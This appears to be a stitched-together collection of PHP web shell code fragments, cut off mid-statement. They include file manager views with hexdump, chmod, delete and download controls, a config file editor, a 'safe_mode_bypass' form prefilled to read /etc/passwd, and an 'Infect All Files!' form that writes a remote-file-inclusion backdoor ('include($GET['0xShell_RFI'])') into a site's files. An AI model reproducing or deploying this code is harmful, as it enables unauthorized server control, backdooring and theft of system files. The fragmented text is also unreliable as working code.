echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>"; } echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "<b>FULL HEXDUMP</b>"; $str = fread($fi, filesize($d . $f)); } else { echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi, $hexdump_lines * $hexdump_rows); } $n = 0; $a0 = "00000000<br>"; $a1 = ""; $a2 = ""; for ($i = 0; $i < strlen($str); $i++) { $a1 .= sprintf("%02X", ord($str[$i])) . " ";
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) { foreach ($settingfile as $file) { if (file_exists($file)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>"; } else { $buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />'; } } unset($file); } else { $close_config_page = false; $styledisplay = ' style="display:none;"'; $showpostn = false; $iserr = false; foreach ($settingfile as $file) { $buffer_TEXT .= "<b>File: " . basename($file) . " (" . view_size(filesize($file)) . ") attrib: " . view_perms_color($file) . "</b><br />"; } unset($file); $buffer_TEXT .= "You're logged with IP: <b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />"; if (isset($_POST['submit']) && $_POST['setupsave'] == 1) { #============= WRITE CONFIG ================ # Final filter to write config # Filter level 2; check strict value; raise error if value not valid if ($task == 'editor') { $edt = $_POST['edit_text']; $sfile = $_POST['file']; if (!write_file($sfile, $edt, 1)) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else { $buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>"; // $r = $edt;
function scandire($dir) { if (empty($dir)) { $dir = getcwd(); } $dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . ''); $dir = getcwd() . "/"; $dir = str_replace("\\", "/", $dir); if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if (filetype($dir . $file) == "dir") { $dire[] = $file; } if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") { $files[] = $file; } // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns "" // if(filetype($dir.$file)=="link") $files[]=$file; // echo "file = ".$file." (".filetype($file).")<br>"; #debug // if (is_link($file)) { echo " -> ".readlink($file); }; #debug } closedir($dh); @sort($dire); @sort($files); echo "<table border>"; echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>'; echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>"; for ($i = 0; $i < count($dire); $i++) { $link = $dir . $dire[$i]; echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>'; } for ($i = 0; $i < count($files); $i++) { $linkfile = $dir . $files[$i]; echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>'; echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>'; } echo "</table>"; } } }
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b>" . $t[0] . "</b></a>"; } echo " |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='" . urlencode($f) . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "<b>FULL HEXDUMP</b>"; $str = fread($fi, filesize($d . $f)); } else { echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi, $hexdump_lines * $hexdump_rows); } $n = 0; $a0 = "00000000<br>"; $a1 = ""; $a2 = ""; for ($i = 0; $i < strlen($str); $i++) { $a1 .= sprintf("%02X", ord($str[$i])) . " ";
print "<form method='post' action='" . $patch . "?action=infect_all_file'>\n" . "<textarea name='cod3inf' cols=50 rows=4>\n" . "<?php include(\$GET['0xShell_RFI']); ?>\n" . "</textarea>\n" . "<br /><input type='submit' value='Infect All Files!' name='inf3ct'><br />\n"; } break; case 'safe_mode_bypass': print "<form action='" . $patch . "?action=safe_mode_bypass' method='POST'>\n" . "File Name: <input type='text' name='filew' value='/etc/passwd'><br />\n" . "<input type='submit' value='Read File' name='red_file'>\n" . "</form>\n"; if (isset($_POST['red_file'])) { if (empty($_POST['filew'])) { die("[ERROR] Enter the name file."); } else { safe_mode_bypass($_POST['filew']); } } break; case 'chmod': $perms = parse_perms(fileperms($_GET['file'])); print "<form action=\"" . $patch . "?action=chmod&file=" . htmlspecialchars($_GET['file']) . "\" method=\"POST\">\n\t\t\t\t<h3 align=\"center\">Chmod File: <i>" . htmlspecialchars($_GET['file']) . " - (" . view_perms_color($_GET['file']) . ")</i></h3><br />\n\t\t\t\t<table align=center width=300 border=0 cellspacing=0 cellpadding=5>\n\t\t\t\t<tr><td><b>Owner</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_o_r' value=1" . ($perms["o"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox name='chmod_o_w' value=1" . ($perms["o"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_o_x' value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td>\n\t\t\t\t<td><b>Group</b><br><br>\t\t\t\t\n\t\t\t\t <input type=checkbox NAME='chmod_g_r' value=1" . ($perms["g"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_w' value=1" . ($perms["g"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_x' value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td>\t\t\t\t\n\t\t\t\t<td><b>World</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_w_r' value=1" . ($perms["w"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_w' value=1" . ($perms["w"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_x' value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td></tr><tr><td>\n\t\t\t\t<input type='submit' name='chmod_edit' value='Save'>\n\t\t\t\t</td></tr>\n\t\t\t\t</table>\n\t\t\t\t</form>"; if (isset($_POST['chmod_edit'])) { $perms_final = "0" . base_convert((@$_POST['chmod_o_r'] ? 1 : 0) . (@$_POST['chmod_o_w'] ? 1 : 0) . (@$_POST['chmod_o_x'] ? 1 : 0) . (@$_POST['chmod_g_r'] ? 1 : 0) . (@$_POST['chmod_g_w'] ? 1 : 0) . (@$_POST['chmod_g_x'] ? 1 : 0) . (@$_POST['chmod_w_r'] ? 1 : 0) . (@$_POST['chmod_w_w'] ? 1 : 0) . (@$_POST['chmod_w_x'] ? 1 : 0), 2, 8); print chmod_shell($_GET['file'], $perms_final); } break; } if (isset($remove_file)) { //Rimozione file if (!is_writable($remove_file)) { die("File Not Deleted"); } if (unlink($remove_file)) { print "<script>alert('File Deleted'); location.href='" . $patch . "';</script>"; } else { print "<script>alert('File Not Deleted'); location.href='" . $patch . "';</script>";
} } // === MAIN $buffer_TEXT = ''; if (!is_readable($fileconfig) or is_dir($fileconfig)) { if (file_exists($fileconfig)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>"; } else { $buffer_TEXT .= "<b>File does not exists.</b>"; } } else { $styledisplay = ' style="display:none"'; $showpostn = false; $iserr = false; $t_head = "<b>File: " . CONFIG_FILE . " (" . view_size(filesize($fileconfig)); $t_head .= ") attrib: " . view_perms_color($fileconfig) . "</b>"; $t_head .= "<br>You're logged with IP: <b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">"; $buffer_TEXT .= $t_head; if (isset($_GET["mode"])) { if ($_GET["mode"] == "editor") { $buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'> Editor </span></p>"; } } if (isset($_POST['submit'])) { if ($task == 'editor') { $edt = $_POST["edit_text"]; $fp = fopen($fileconfig, "w"); if (!$fp) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else { fwrite($fp, $edt);